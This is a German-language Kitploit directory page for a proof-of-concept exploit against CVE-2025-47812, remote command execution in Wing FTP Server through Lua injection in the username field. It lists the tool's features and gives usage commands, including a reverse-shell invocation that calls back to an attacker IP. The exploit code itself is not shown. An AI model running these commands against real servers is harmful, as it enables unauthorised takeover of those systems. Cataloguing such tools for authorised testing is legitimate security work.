Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WingFTP-CVE-2025-47812-illdeed — Exploit für Remote Command Execution in Wing FTP Server (CVE-2025-47812) | Kitploit
Tools/GitHubGitHub/ill-deed/wingftp-cve-2025-47812-illdeed
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubill-deed/wingftp-cve-2025-47812-illdeed

WingFTP-CVE-2025-47812-illdeed

Exploit für Remote Command Execution in Wing FTP Server (CVE-2025-47812)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 JahrNoch nicht geprüft

CVE-2025-47812 – Wing FTP Server RCE-Exploit

Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2025-47812, eine Remote-Befehlsausführungs-Schwachstelle (RCE) in Wing FTP Server. Ein Angreifer kann beliebige Lua-basierte Systembefehle injizieren und ausführen, indem er den Parameter username während der Authentifizierung missbraucht, was zu einer vollständigen Remote-Codeausführung führt.


📌 Exploit-Funktionen

  • 🔧 Remote-Ausführung benutzerdefinierter Shell-Befehle
  • 🧬 Mehrere integrierte Reverse-Shell-Payloads (bash, Python, netcat usw.)
  • 🪪 Automatische UID-Extraktion aus Set-Cookie
  • 📦 Protokolliert erfolgreiche UIDs in found_uids.txt
  • 🧪 Dry-Run-Modus (keine tatsächlichen Anfragen werden gesendet – testen Sie Ihre Eingabe-/Ausgabelogik sicher)
  • 🔁 Wiederholungslogik bei Netzwerkfehlern
  • 🧹 Sauberere Payload-Formatierung und lesbare Ausgabe
  • ✅ Eingabevalidierung für IPs, Ports und URLs
  • ⚙️ Unterstützung für Befehlszeilenargumente für automatisierte Arbeitsabläufe

💻 Verwendung

Einfachen Shell-Befehl ausführen:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"

Reverse Shell auslösen:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444

Dry-Run-Modus (es werden keine Anfragen gesendet):

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run

🔄 Änderungen am ursprünglichen Exploit


⚠️ Haftungsausschluss

Dieses Projekt ist nur für Bildungszwecke und autorisierte Sicherheitstests gedacht.
Verwenden Sie dieses Tool nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.


Tool herunterladen
Feature/VerbesserungBeschreibung
✅ Argument-Parsingargparse-CLI-Unterstützung für den nicht-interaktiven Modus hinzugefügt
🔐 EingabevalidierungStellt gültige URL/IP/Port sicher, bevor der Exploit versucht wird
📦 Header-RefactoringHTTP-Header in eine wiederverwendbare Funktion extrahiert
📄 UID-ProtokollierungSpeichert erfolgreiche UID-Tokens in found_uids.txt
🧪 Dry-Run-ModusErmöglicht sicheres Testen ohne Senden von Anfragen (--dry-run)
🕒 Timeout + WiederholungenFügt Anfragetimeout und automatische Wiederholungsversuche bei Fehlern hinzu
🧼 Payload-LesbarkeitLua-Injektionszeichenfolge für Klarheit und Wartung neu formatiert
📊 Strukturierte AusgabeServerantworten und Payload-Informationen mit Trennzeichen für einfaches Lesen umschlossen
⚠️ Statuscode-PrüfungenWarnt den Benutzer, wenn das Ziel unerwartete HTTP-Statuscodes zurückgibt
📝 ProtokollierungssystemErsetzt print() durch das Python-Modul logging für bessere Verbositätskontrolle